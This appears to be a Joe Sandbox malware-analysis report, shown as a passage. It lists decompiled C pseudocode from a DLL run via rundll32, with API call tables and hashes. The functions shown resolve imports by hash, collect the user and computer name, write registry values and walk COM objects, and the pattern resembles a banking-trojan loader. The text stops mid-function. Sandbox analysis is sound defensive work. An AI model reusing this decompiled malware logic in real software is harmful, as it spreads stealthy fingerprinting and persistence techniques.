                    					_t23 =  *0x444a320; // 0xafd5a8
                    					_t1 = _t23 + 0x444b11a; // 0x4c44544e
                    					_t48 = GetModuleHandleA(_t1);
                    					_t26 =  *0x444a320; // 0xafd5a8
                    					_t2 = _t26 + 0x444b769; // 0x7243775a
                    					_v8 = 0x7f;
                    					_t28 = GetProcAddress(_t48, _t2);
                    					 *(_t54 + 0xc) = _t28;
                    					if(_t28 == 0) {
                    						L8:
                    						E044417AB(_t54);
                    					} else {
                    						_t30 =  *0x444a320; // 0xafd5a8
                    						_t5 = _t30 + 0x444b756; // 0x614d775a
                    						_t32 = GetProcAddress(_t48, _t5);
                    						 *(_t54 + 0x10) = _t32;
                    						if(_t32 == 0) {
                    							goto L8;
                    						} else {
                    							_t33 =  *0x444a320; // 0xafd5a8
                    							_t7 = _t33 + 0x444b40b; // 0x6e55775a
                    							_t35 = GetProcAddress(_t48, _t7);
                    							 *(_t54 + 0x14) = _t35;
                    							if(_t35 == 0) {
                    								goto L8;
                    							} else {
                    								_t36 =  *0x444a320; // 0xafd5a8
                    								_t9 = _t36 + 0x444b4d2; // 0x4e6c7452
                    								_t38 = GetProcAddress(_t48, _t9);
                    								 *(_t54 + 0x18) = _t38;
                    								if(_t38 == 0) {
                    									goto L8;
                    								} else {
                    									_t39 =  *0x444a320; // 0xafd5a8
                    									_t11 = _t39 + 0x444b779; // 0x6c43775a
                    									_t41 = GetProcAddress(_t48, _t11);
                    									 *(_t54 + 0x1c) = _t41;
                    									if(_t41 == 0) {
                    										goto L8;
                    									} else {
                    										 *((intOrPtr*)(_t54 + 4)) = _a4;
                    										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                    										_t44 = E0444462B(_t54, _a8);
                    										_v8 = _t44;
                    										if(_t44 != 0) {
                    											goto L8;
                    										} else {
                    											 *_a12 = _t54;
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return _v8;
                    			}

                    APIs
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04441986,?,?,?,?,00000000,00000000), ref: 04446274
                    • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04446296
                    • GetProcAddress.KERNEL32(00000000,614D775A), ref: 044462AC
                    • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 044462C2
                    • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 044462D8
                    • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 044462EE
                      • Part of subcall function 0444462B: memset.NTDLL ref: 044446AA
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$AllocateHandleHeapModulememset
                    • String ID:
                    • API String ID: 1886625739-0
                    • Opcode ID: 1c2852cbf617cbbe86d76ba35e2a07e3834915dec5463c38bd0d86126df549a3
                    • Instruction ID: ce2e1ee4a90d822f2de3d92a819b0b3e5ee0a49f656c5205af16fb3621672921
                    • Opcode Fuzzy Hash: 1c2852cbf617cbbe86d76ba35e2a07e3834915dec5463c38bd0d86126df549a3
                    • Instruction Fuzzy Hash: E72141B5600246AFFB20DF69C884E5BB7ECEB89744B054466E505D7201EB39FD068F60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E04442B1E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                    				signed int _v8;
                    				char _v12;
                    				signed int* _v16;
                    				char _v284;
                    				void* __esi;
                    				char* _t59;
                    				intOrPtr* _t60;
                    				intOrPtr _t64;
                    				char _t65;
                    				intOrPtr _t68;
                    				intOrPtr _t69;
                    				intOrPtr _t71;
                    				void* _t73;
                    				signed int _t81;
                    				void* _t91;
                    				void* _t92;
                    				char _t98;
                    				signed int* _t100;
                    				intOrPtr* _t101;
                    				void* _t102;
                    
                    				_t92 = __ecx;
                    				_v8 = _v8 & 0x00000000;
                    				_t98 = _a16;
                    				if(_t98 == 0) {
                    					__imp__( &_v284,  *0x444a3dc);
                    					_t91 = 0x80000002;
                    					L6:
                    					_t59 = E04445406( &_v284,  &_v284);
                    					_a8 = _t59;
                    					if(_t59 == 0) {
                    						_v8 = 8;
                    						L29:
                    						_t60 = _a20;
                    						if(_t60 != 0) {
                    							 *_t60 =  *_t60 + 1;
                    						}
                    						return _v8;
                    					}
                    					_t101 = _a24;
                    					if(E04447488(_t92, _t97, _t101, _t91, _t59) != 0) {
                    						L27:
                    						E044417AB(_a8);
                    						goto L29;
                    					}
                    					_t64 =  *0x444a318; // 0x4f49d58
                    					_t16 = _t64 + 0xc; // 0x4f49e7a
                    					_t65 = E04445406(_t64,  *_t16);
                    					_a24 = _t65;
                    					if(_t65 == 0) {
                    						L14:
                    						_t29 = _t101 + 0x14; // 0x102
                    						_t33 = _t101 + 0x10; // 0x3d044490
                    						if(E04445B98(_t97,  *_t33, _t91, _a8,  *0x444a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                    							_t68 =  *0x444a320; // 0xafd5a8
                    							if(_t98 == 0) {
                    								_t35 = _t68 + 0x444ba3f; // 0x4d4c4b48
                    								_t69 = _t35;
                    							} else {
                    								_t34 = _t68 + 0x444b8e7; // 0x55434b48
                    								_t69 = _t34;
                    							}
                    							if(E0444266A(_t69,  *0x444a3d4,  *0x444a3d8,  &_a24,  &_a16) == 0) {
                    								if(_t98 == 0) {
                    									_t71 =  *0x444a320; // 0xafd5a8
                    									_t44 = _t71 + 0x444b846; // 0x74666f53
                    									_t73 = E04445406(_t44, _t44);
                    									_t99 = _t73;
                    									if(_t73 == 0) {
                    										_v8 = 8;
                    									} else {
                    										_t47 = _t101 + 0x10; // 0x3d044490
                    										E044434EE( *_t47, _t91, _a8,  *0x444a3d8, _a24);
                    										_t49 = _t101 + 0x10; // 0x3d044490
                    										E044434EE( *_t49, _t91, _t99,  *0x444a3d0, _a16);
                    										E044417AB(_t99);
                    									}
                    								} else {
                    									_t40 = _t101 + 0x10; // 0x3d044490
                    									E044434EE( *_t40, _t91, _a8,  *0x444a3d8, _a24);
                    									_t43 = _t101 + 0x10; // 0x3d044490
                    									E044434EE( *_t43, _t91, _a8,  *0x444a3d0, _a16);
                    								}
                    								if( *_t101 != 0) {
                    									E044417AB(_a24);
                    								} else {
                    									 *_t101 = _a16;
                    								}
                    							}
                    						}
                    						goto L27;
                    					}
                    					_t21 = _t101 + 0x10; // 0x3d044490
                    					_t81 = E04441BC5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                    					if(_t81 == 0) {
                    						_t100 = _v16;
                    						if(_v12 == 0x28) {
                    							 *_t100 =  *_t100 & _t81;
                    							_t26 = _t101 + 0x10; // 0x3d044490
                    							E04445B98(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                    						}
                    						E044417AB(_t100);
                    						_t98 = _a16;
                    					}
                    					E044417AB(_a24);
                    					goto L14;
                    				}
                    				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                    					goto L29;
                    				} else {
                    					_t97 = _a8;
                    					E04447961(_t98, _a8,  &_v284);
                    					__imp__(_t102 + _t98 - 0x117,  *0x444a3dc);
                    					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                    					_t91 = 0x80000003;
                    					goto L6;
                    				}
                    			}

                    APIs
                    • StrChrA.SHLWAPI(04441850,0000005F,00000000,00000000,00000104), ref: 04442B51
                    • lstrcpy.KERNEL32(?,?), ref: 04442B7E
                      • Part of subcall function 04445406: lstrlen.KERNEL32(?,00000000,04F49D58,00000000,04443C77,04F49F7B,69B25F44,?,?,?,?,69B25F44,00000005,0444A00C,4D283A53,?), ref: 0444540D
                      • Part of subcall function 04445406: mbstowcs.NTDLL ref: 04445436
                      • Part of subcall function 04445406: memset.NTDLL ref: 04445448
                      • Part of subcall function 044434EE: lstrlenW.KERNEL32(?,?,?,04442CE7,3D044490,80000002,04441850,04445F20,74666F53,4D4C4B48,04445F20,?,3D044490,80000002,04441850,?), ref: 04443513
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    • lstrcpy.KERNEL32(?,00000000), ref: 04442BA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                    • String ID: ($\
                    • API String ID: 3924217599-1512714803
                    • Opcode ID: 0b107b832cd42268a359ad60819e4074b12d8c65f54726a53ce9a197259c09a4
                    • Instruction ID: c09a1b0f7d551a9d9dfd2f5f876990208fc704cf3b74f17818decb690aa2b851
                    • Opcode Fuzzy Hash: 0b107b832cd42268a359ad60819e4074b12d8c65f54726a53ce9a197259c09a4
                    • Instruction Fuzzy Hash: 2C518E79100209EFFF229F61DC44EAA77B9FF84384F00845AFA11A6161EB75F965EB10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E04444DFF() {
                    				void* _v0;
                    				void** _t3;
                    				void** _t5;
                    				void** _t7;
                    				void** _t8;
                    				void* _t10;
                    
                    				_t3 =  *0x444a3cc; // 0x4f495b0
                    				__imp__( &(_t3[0x10]));
                    				while(1) {
                    					_t5 =  *0x444a3cc; // 0x4f495b0
                    					_t1 =  &(_t5[0x16]); // 0x0
                    					if( *_t1 == 0) {
                    						break;
                    					}
                    					Sleep(0xa);
                    				}
                    				_t7 =  *0x444a3cc; // 0x4f495b0
                    				_t10 =  *_t7;
                    				if(_t10 != 0 && _t10 != 0x444b81a) {
                    					HeapFree( *0x444a2d8, 0, _t10);
                    					_t7 =  *0x444a3cc; // 0x4f495b0
                    				}
                    				 *_t7 = _v0;
                    				_t8 =  &(_t7[0x10]);
                    				__imp__(_t8);
                    				return _t8;
                    			}

                    APIs
                    • RtlEnterCriticalSection.NTDLL(04F49570), ref: 04444E08
                    • Sleep.KERNEL32(0000000A), ref: 04444E12
                    • HeapFree.KERNEL32(00000000), ref: 04444E40
                    • RtlLeaveCriticalSection.NTDLL(04F49570), ref: 04444E55
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                    • String ID: Ut
                    • API String ID: 58946197-8415677
                    • Opcode ID: d9bbeaa79f4422566172bf074ab47a936d9c7282359728f70a2c783a30f066cc
                    • Instruction ID: 27523caf74bc0c4ca221c73e3b7a120a1b58018d05f369b82812a642ef911f71
                    • Opcode Fuzzy Hash: d9bbeaa79f4422566172bf074ab47a936d9c7282359728f70a2c783a30f066cc
                    • Instruction Fuzzy Hash: 59F0D4B93802019FFB18CF64ED49B1777B5EBC4701B14800AE802E7390DB38EC11EA24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04444B71() {
                    				long _v8;
                    				long _v12;
                    				int _v16;
                    				long _t39;
                    				long _t43;
                    				signed int _t47;
                    				signed int _t52;
                    				int _t56;
                    				int _t57;
                    				char* _t63;
                    				short* _t66;
                    
                    				_v16 = 0;
                    				_v8 = 0;
                    				GetUserNameW(0,  &_v8);
                    				_t39 = _v8;
                    				if(_t39 != 0) {
                    					_v12 = _t39;
                    					_v8 = 0;
                    					GetComputerNameW(0,  &_v8);
                    					_t43 = _v8;
                    					if(_t43 != 0) {
                    						_v12 = _v12 + _t43 + 2;
                    						_t63 = E044463FD(_v12 + _t43 + 2 << 2);
                    						if(_t63 != 0) {
                    							_t47 = _v12;
                    							_t66 = _t63 + _t47 * 2;
                    							_v8 = _t47;
                    							if(GetUserNameW(_t66,  &_v8) == 0) {
                    								L7:
                    								E044417AB(_t63);
                    							} else {
                    								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
                    								_t52 = _v8;
                    								_v12 = _v12 - _t52;
                    								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
                    									goto L7;
                    								} else {
                    									_t56 = _v12 + _v8;
                    									_v12 = _t56;
                    									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t56 + 2, 0, 0);
                    									_v8 = _t57;
                    									if(_t57 == 0) {
                    										goto L7;
                    									} else {
                    										_t63[_t57] = 0;
                    										_v16 = _t63;
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return _v16;
                    			}

                    APIs
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04444B85
                    • GetComputerNameW.KERNEL32(00000000,?), ref: 04444BA1
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04444BDB
                    • GetComputerNameW.KERNEL32(?,?), ref: 04444BFD
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000040,00000000,00000000), ref: 04444C20
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                    • String ID:
                    • API String ID: 3850880919-0
                    • Opcode ID: bfdca03c6c0f6402501fda5e6299c54aee087f57cbcf80434050476ea2547e72
                    • Instruction ID: e00295700a1a7ae61eccf6ed06a36b74da38f9031c7174ff85b30374c873956f
                    • Opcode Fuzzy Hash: bfdca03c6c0f6402501fda5e6299c54aee087f57cbcf80434050476ea2547e72
                    • Instruction Fuzzy Hash: 6021D9B5900208FBEB21DFE9C9849EEBBB8EE84304B5545AAE501E7200DA34AB45DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04445A5A(intOrPtr _a4) {
                    				void* _t2;
                    				long _t4;
                    				void* _t5;
                    				long _t6;
                    				void* _t7;
                    				void* _t13;
                    
                    				_t2 = CreateEventA(0, 1, 0, 0);
                    				 *0x444a30c = _t2;
                    				if(_t2 == 0) {
                    					return GetLastError();
                    				}
                    				_t4 = GetVersion();
                    				if(_t4 != 5) {
                    					L4:
                    					if(_t13 <= 0) {
                    						_t5 = 0x32;
                    						return _t5;
                    					}
                    					L5:
                    					 *0x444a2fc = _t4;
                    					_t6 = GetCurrentProcessId();
                    					 *0x444a2f8 = _t6;
                    					 *0x444a304 = _a4;
                    					_t7 = OpenProcess(0x10047a, 0, _t6);
                    					 *0x444a2f4 = _t7;
                    					if(_t7 == 0) {
                    						 *0x444a2f4 =  *0x444a2f4 | 0xffffffff;
                    					}
                    					return 0;
                    				}
                    				if(_t4 > 0) {
                    					goto L5;
                    				}
                    				_t13 = _t4 - _t4;
                    				goto L4;
                    			}

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04444603,?), ref: 04445A62
                    • GetVersion.KERNEL32 ref: 04445A71
                    • GetCurrentProcessId.KERNEL32 ref: 04445A88
                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04445AA5
                    • GetLastError.KERNEL32 ref: 04445AC4
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                    • String ID:
                    • API String ID: 2270775618-0
                    • Opcode ID: d061310d6a94c7dcc6fd31be6ea543a5d34dc564763fe9ae00350dad5a4d02cf
                    • Instruction ID: 2dae1921445950651590c55eab5c0f99c11fdcf14b376e197990b73e4ef1d463
                    • Opcode Fuzzy Hash: d061310d6a94c7dcc6fd31be6ea543a5d34dc564763fe9ae00350dad5a4d02cf
                    • Instruction Fuzzy Hash: DDF03CB8782301AFFF209F74A849B167A61E7C4B51F00451AE616F62C0D7785841AA15
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 46%
                    			E04443D67(intOrPtr* __eax) {
                    				void* _v8;
                    				WCHAR* _v12;
                    				void* _v16;
                    				char _v20;
                    				void* _v24;
                    				intOrPtr _v28;
                    				void* _v32;
                    				intOrPtr _v40;
                    				short _v48;
                    				intOrPtr _v56;
                    				short _v64;
                    				intOrPtr* _t54;
                    				intOrPtr* _t56;
                    				intOrPtr _t57;
                    				intOrPtr* _t58;
                    				intOrPtr* _t60;
                    				void* _t61;
                    				intOrPtr* _t63;
                    				intOrPtr* _t65;
                    				intOrPtr* _t67;
                    				intOrPtr* _t69;
                    				intOrPtr* _t71;
                    				intOrPtr* _t74;
                    				intOrPtr* _t76;
                    				intOrPtr _t78;
                    				intOrPtr* _t82;
                    				intOrPtr* _t86;
                    				intOrPtr _t102;
                    				intOrPtr _t108;
                    				void* _t117;
                    				void* _t121;
                    				void* _t122;
                    				intOrPtr _t129;
                    
                    				_t122 = _t121 - 0x3c;
                    				_push( &_v8);
                    				_push(__eax);
                    				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                    				if(_t117 >= 0) {
                    					_t54 = _v8;
                    					_t102 =  *0x444a320; // 0xafd5a8
                    					_t5 = _t102 + 0x444b038; // 0x3050f485
                    					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                    					_t56 = _v8;
                    					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                    					if(_t117 >= 0) {
                    						__imp__#2(0x4449290);
                    						_v28 = _t57;
                    						if(_t57 == 0) {
                    							_t117 = 0x8007000e;
                    						} else {
                    							_t60 = _v32;
                    							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                    							_t86 = __imp__#6;
                    							_t117 = _t61;
                    							if(_t117 >= 0) {
                    								_t63 = _v24;
                    								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                    								if(_t117 >= 0) {
                    									_t129 = _v20;
                    									if(_t129 != 0) {
                    										_v64 = 3;
                    										_v48 = 3;
                    										_v56 = 0;
                    										_v40 = 0;
                    										if(_t129 > 0) {
                    											while(1) {
                    												_t67 = _v24;
                    												asm("movsd");
                    												asm("movsd");
                    												asm("movsd");
                    												asm("movsd");
                    												_t122 = _t122;
                    												asm("movsd");
                    												asm("movsd");
                    												asm("movsd");
                    												asm("movsd");
                    												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                    												if(_t117 < 0) {
                    													goto L16;
                    												}
                    												_t69 = _v8;
                    												_t108 =  *0x444a320; // 0xafd5a8
                    												_t28 = _t108 + 0x444b0bc; // 0x3050f1ff
                    												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                    												if(_t117 >= 0) {
                    													_t74 = _v16;
                    													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                    													if(_t117 >= 0 && _v12 != 0) {
                    														_t78 =  *0x444a320; // 0xafd5a8
                    														_t33 = _t78 + 0x444b078; // 0x76006f
                    														if(lstrcmpW(_v12, _t33) == 0) {
                    															_t82 = _v16;
                    															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                    														}
                    														 *_t86(_v12);
                    													}
                    													_t76 = _v16;
                    													 *((intOrPtr*)( *_t76 + 8))(_t76);
                    												}
                    												_t71 = _v8;
                    												 *((intOrPtr*)( *_t71 + 8))(_t71);
                    												_v40 = _v40 + 1;
                    												if(_v40 < _v20) {
                    													continue;
                    												}
                    												goto L16;
                    											}
                    										}
                    									}
                    								}
                    								L16:
                    								_t65 = _v24;
                    								 *((intOrPtr*)( *_t65 + 8))(_t65);
                    							}
                    							 *_t86(_v28);
                    						}
                    						_t58 = _v32;
                    						 *((intOrPtr*)( *_t58 + 8))(_t58);
                    					}
                    				}
                    				return _t117;
                    			}

                    APIs
                    • SysAllocString.OLEAUT32(04449290), ref: 04443DB7
                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04443E99
                    • SysFreeString.OLEAUT32(00000000), ref: 04443EB2
                    • SysFreeString.OLEAUT32(?), ref: 04443EE1
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: String$Free$Alloclstrcmp
                    • String ID:
                    • API String ID: 1885612795-0
                    • Opcode ID: b0faea9e4ec009f0cc0f1d6bed5409f5f24ab86f57b993647a79d3787dcbd451
                    • Instruction ID: 8d90cac2b23bf8a115b243e648ee0d23d01a7c6d53838f13019ff17452f9d628
                    • Opcode Fuzzy Hash: b0faea9e4ec009f0cc0f1d6bed5409f5f24ab86f57b993647a79d3787dcbd451
                    • Instruction Fuzzy Hash: 78512C75E00509EFEF11DFA8C4888AEF7B9FFC9704B244599E915AB210D771AE01CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E0444420F(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				signed int _v16;
                    				void _v156;
                    				void _v428;
                    				void* _t55;
                    				unsigned int _t56;
                    				signed int _t66;
                    				signed int _t74;
                    				void* _t76;
                    				signed int _t79;
                    				void* _t81;
                    				void* _t92;
                    				void* _t96;
                    				signed int* _t99;
                    				signed int _t101;
                    				signed int _t103;
                    				void* _t107;
                    
                    				_t92 = _a12;
                    				_t101 = __eax;
                    				_t55 = E044425C1(_a16, _t92);
                    				_t79 = _t55;
                    				if(_t79 == 0) {
                    					L18:
                    					return _t55;
                    				}
                    				_t56 =  *(_t92 + _t79 * 4 - 4);
                    				_t81 = 0;
                    				_t96 = 0x20;
                    				if(_t56 == 0) {
                    					L4:
                    					_t97 = _t96 - _t81;
                    					_v12 = _t96 - _t81;
                    					E04442E5D(_t79,  &_v428);
                    					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E0444375F(_t101,  &_v428, _a8, _t96 - _t81);
                    					E0444375F(_t79,  &_v156, _a12, _t97);
                    					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                    					_t66 = E04442E5D(_t101, 0x444a1d0);
                    					_t103 = _t101 - _t79;
                    					_a8 = _t103;
                    					if(_t103 < 0) {
                    						L17:
                    						E04442E5D(_a16, _a4);
                    						E04441212(_t79,  &_v428, _a4, _t97);
                    						memset( &_v428, 0, 0x10c);
                    						_t55 = memset( &_v156, 0, 0x84);
                    						goto L18;
                    					}
                    					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                    					do {
                    						if(_v8 != 0xffffffff) {
                    							_push(1);
                    							_push(0);
                    							_push(0);
                    							_push( *_t99);
                    							L0444818A();
                    							_t74 = _t66 +  *(_t99 - 4);
                    							asm("adc edx, esi");
                    							_push(0);
                    							_push(_v8 + 1);
                    							_push(_t92);
                    							_push(_t74);
                    							L04448184();
                    							if(_t92 > 0 || _t74 > 0xffffffff) {
                    								_t74 = _t74 | 0xffffffff;
                    								_v16 = _v16 & 0x00000000;
                    							}
                    						} else {
                    							_t74 =  *_t99;
                    						}
                    						_t106 = _t107 + _a8 * 4 - 0x1a8;
                    						_a12 = _t74;
                    						_t76 = E04442EE3(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                    						while(1) {
                    							 *_t99 =  *_t99 - _t76;
                    							if( *_t99 != 0) {
                    								goto L14;
                    							}
                    							L13:
                    							_t92 =  &_v156;
                    							if(E04445776(_t79, _t92, _t106) < 0) {
                    								break;
                    							}
                    							L14:
                    							_a12 = _a12 + 1;
                    							_t76 = E04444A1C(_t79,  &_v156, _t106, _t106);
                    							 *_t99 =  *_t99 - _t76;
                    							if( *_t99 != 0) {
                    								goto L14;
                    							}
                    							goto L13;
                    						}
                    						_a8 = _a8 - 1;
                    						_t66 = _a12;
                    						_t99 = _t99 - 4;
                    						 *(0x444a1d0 + _a8 * 4) = _t66;
                    					} while (_a8 >= 0);
                    					_t97 = _v12;
                    					goto L17;
                    				}
                    				while(_t81 < _t96) {
                    					_t81 = _t81 + 1;
                    					_t56 = _t56 >> 1;
                    					if(_t56 != 0) {
                    						continue;
                    					}
                    					goto L4;
                    				}
                    				goto L4;
                    			}






















                    APIs
                    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 044442C2
                    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 044442D8
                    • memset.NTDLL ref: 04444381
                    • memset.NTDLL ref: 04444397
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: memset$_allmul_aulldiv
                    • String ID:
                    • API String ID: 3041852380-0
                    • Opcode ID: 7d045a9c51446df3a86560ada8185472fcc6e5dd40853199ad363468db88023b
                    • Instruction ID: 9acf4da7622b892156292de26d8085c68953c058b13f5c2e51d5f11fdb642a51
                    • Opcode Fuzzy Hash: 7d045a9c51446df3a86560ada8185472fcc6e5dd40853199ad363468db88023b
                    • Instruction Fuzzy Hash: 9441A031B00219ABFF10EF69DC40BEEB765EF85754F10856AF909A7281DB70BE458B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 42%
                    			E0444135F(void* __eax, void* __ecx) {
                    				char _v8;
                    				void* _v12;
                    				intOrPtr _v16;
                    				char _v20;
                    				void* __esi;
                    				void* _t30;
                    				intOrPtr _t38;
                    				intOrPtr* _t39;
                    				intOrPtr* _t41;
                    				void* _t54;
                    				long _t64;
                    				void* _t67;
                    				void* _t69;
                    
                    				_t58 = __ecx;
                    				_t67 = __eax;
                    				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                    					L2:
                    					_t30 = _t67;
                    					_pop(_t68);
                    					_t69 = _t30;
                    					_t64 = 0;
                    					ResetEvent( *(_t69 + 0x1c));
                    					_push( &_v8);
                    					_push(4);
                    					_push( &_v20);
                    					_push( *((intOrPtr*)(_t69 + 0x18)));
                    					if( *0x444a164() != 0) {
                    						L9:
                    						if(_v8 == 0) {
                    							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                    						} else {
                    							 *0x444a174(0, 1,  &_v12);
                    							if(0 != 0) {
                    								_t64 = 8;
                    							} else {
                    								_t38 = E044463FD(0x1000);
                    								_v16 = _t38;
                    								if(_t38 == 0) {
                    									_t64 = 8;
                    								} else {
                    									_push(0);
                    									_push(_v8);
                    									_push( &_v20);
                    									while(1) {
                    										_t41 = _v12;
                    										_t61 =  *_t41;
                    										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                    										ResetEvent( *(_t69 + 0x1c));
                    										_push( &_v8);
                    										_push(0x1000);
                    										_push(_v16);
